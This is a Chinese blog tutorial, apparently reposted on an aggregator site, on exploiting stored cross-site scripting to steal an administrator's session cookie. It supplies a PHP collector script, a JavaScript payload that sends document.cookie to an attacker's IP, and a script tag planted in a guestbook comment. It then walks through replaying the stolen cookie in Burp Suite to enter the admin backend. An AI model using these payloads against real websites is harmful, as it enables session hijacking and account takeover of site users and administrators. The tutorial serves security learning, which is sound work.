XSS详解及其利用方式

这篇具有很好参考价值的文章主要介绍了XSS详解及其利用方式。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

XSS-xss

  • XSS是什么???

    XSS(跨站脚本攻击)通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。

不知道各位小伙伴对于文字描述的概念能不能看的懂,偷偷告诉你们:“反正我是看不太懂😂”,本次我们主要对存储型xss进行学习和利用,想了解xss其他类型的小伙伴也可以参考一下以下博主的文章,写的也是特别详细!(拓展:反射型详解,DOM型详解)

  • 存储型XSS
    • 存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行;这种XSS比较危险,容易造成蠕虫,盗窃cookie等;
  • 第一步:判断是否存在xss漏洞,发现有个搜索可以利用一下;
    • 利用<script>alert(1)</script>看是否会弹窗进行判断;

XSS详解及其利用方式

  • 点击搜索后发现页面弹出了1,说明该处存在xss漏洞;

XSS详解及其利用方式

  • 第二步:思考一个问题,虽然可以拿到cookie值,但是怎么样才能把每一次获取到的cookie值保存起来呢?;

    • 打开终端,开启apache2,并进入/var/www/html目录;
      root@kali:~# service apache2 start
      root@kali:~# cd /var/www/html
      root@kali:/var/www/html#

    • 创建cookie.php(注:用于将获取到的cookie存在xss.txt文件中);

      代码如下:
      	<?php
      		$file="/var/www/html/xss.txt";
      		$fp=fopen($file,"a+");
      		fwrite($fp,$_GET["c"]);
      		fclose($fp);
      	?>
      
    • 再创建cookie.js(注:用于获取cookie值);

      代码如下:
      	var img = document.createElement('img');
      	img.width = 0;
      	img.height = 0;
      	img.src = 'http://攻击者ip/cookie.php?c='+document.cookie;
      
  • 第三步:在留言处插入获取cook值的代码;

      	注:通过ip将获取到的cookie值保存在xss.txt里;
      	<script src=http://攻击者ip/cookie.js></script>
    

XSS详解及其利用方式

  • 第四步:发现留言需要管理员审核,假如此时我就是管理员,去后台查看留言,只要查看就会触发恶意代码,获取cookie值;

XSS详解及其利用方式

  • 第五步:ls命令查看文件发现果然多了一个xss.txt文件,说明获取到了管理员cookie值,cat命令查看cookie值并复制;
    root@kali:/var/www/html# ls
    root@kali:/var/www/html# cat xss.txt
  • 打开Burp suite抓包工具修改配置,粘贴cookie值到Replace,前面记得加Cookie:头;

XSS详解及其利用方式

  • 第六步:抓包修改包内容后一次一次放包;

XSS详解及其利用方式

  • 第七步:放完所有包后,返回发现已经成功进入管理员后台;

XSS详解及其利用方式

  • 请各位小伙伴按照实际完成情况打分哟!
    • 成功获取cookie值=50分
    • 成功登录管理员后台=100分

以上就是存储型xss利用的基本操作,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,记得走之前别忘了点个赞哟😁!文章来源地址https://www.toymoban.com/news/detail-425812.html

到了这里,关于XSS详解及其利用方式的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 利用XSS漏洞打cookie

    目录 1、为什么要打cookie? 2、怎样利用XSS来打cookie? 3、利用Bluelotus_xssReceiver平台来打cookie 4、利用beef-xss平台来打cookie 上一篇给大家介绍了xss漏洞的基础知识,在本篇章将会介绍和演示一下利用xss漏洞打cookie的演示,还不了解xss漏洞是什么的小伙伴可以先看这篇文章: 初识

    2024年01月19日
    浏览(107)
  • xss专题1-原理解析和简单利用

    跨站脚本攻击(XSS)是一种常见的网络安全漏洞,其原理涉及恶意用户向网页注入客户端脚本代码,使其在用户的浏览器中执行。攻击者利用输入栏或其他用户可输入内容的地方,注入包含恶意脚本的数据。当其他用户访问包含恶意注入内容的页面时,这些脚本将在其浏览器

    2024年02月05日
    浏览(44)
  • 【网络安全】实操XSS订单系统漏洞(利用盲打)

    博主昵称:跳楼梯企鹅 博主主页面链接:

    2024年01月23日
    浏览(42)
  • 网络安全:Kali Linux 进行SQL注入与XSS漏洞利用

    目录 一、实验 1.环境 2.Kali Linux 进行SQL注入 3.Kali Linux 进行XSS漏洞利用 二、问题 1.XSS分类 2.如何修改beef-xss的密码 3.beef-xss 服务如何管理 4.运行beef报错 5.beef 命令的颜色有哪些区别 6.owasp-top-10 有哪些变化 (1)主机 表1  主机 系统 版本 IP 备注 Kali Linux 2022.4 192.168.204.154(动态

    2024年04月26日
    浏览(40)
  • XSS攻击:利用Beef劫持被攻击者客户端浏览器

    实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner) 实验步骤: 实验环境搭建。 角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建) 攻击者

    2024年02月03日
    浏览(50)
  • XSS详解

    xss跨站脚本攻击,攻击者通过往web页面里插入恶意的script代码,当用户浏览页面时,嵌入web页面里的script代码就会被执行,从而达到攻击的目的。xss攻击是针对用户层面的。 存储型,反射型,DOM型 存储型xss:存储型xss,持久化代码是存储在服务器中的 反射型xss:非持久化,

    2024年02月05日
    浏览(30)
  • 代码审计——XSS详解

    跨站脚本攻击(Cross Site Script)是一种将恶意JavaScript代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。 攻击者利用应用程序的动态展示数据功能,在html页面里嵌入恶意代码。当用户浏览该页之时,这些嵌入在html中的恶意代码会被执行,用户浏览器被攻击者控制,从

    2024年02月10日
    浏览(41)
  • 跨站脚本攻击(XSS)详解

    XSS(Cross Site Script)攻击,通常指黑客通过\\\"HTML注入\\\"篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。 一开始,这种攻击的演示案例是跨域的,所以叫做\\\"跨站脚本\\\"。现在是否跨域已经不再重要,但是名字一直沿用下来。 XSS长期以来被列

    2024年02月06日
    浏览(56)
  • XSS(跨站脚本攻击)详解

    XSS是一种常见的安全漏洞,它允许攻击者在受害者浏览器上执行恶意脚本。攻击者通过在网页中注入恶意代码,使得用户浏览该页面时,恶意代码会被执行。 XSS的类型: 存储型 XSS(Stored XSS) :攻击者将恶意代码存储到目标网站的数据库中,当其他用户浏览相关页面时,恶

    2024年02月16日
    浏览(46)
  • pikachu靶场练习——XSS详解

    Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写\\\"CSS\\\"冲突,故又称XSS。 非持久化攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(不会存储在服务器,不会经过数据库),一般容易出现在搜索页面。 持久化代码是存储在服务器中的,

    2024年02月09日
    浏览(59)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包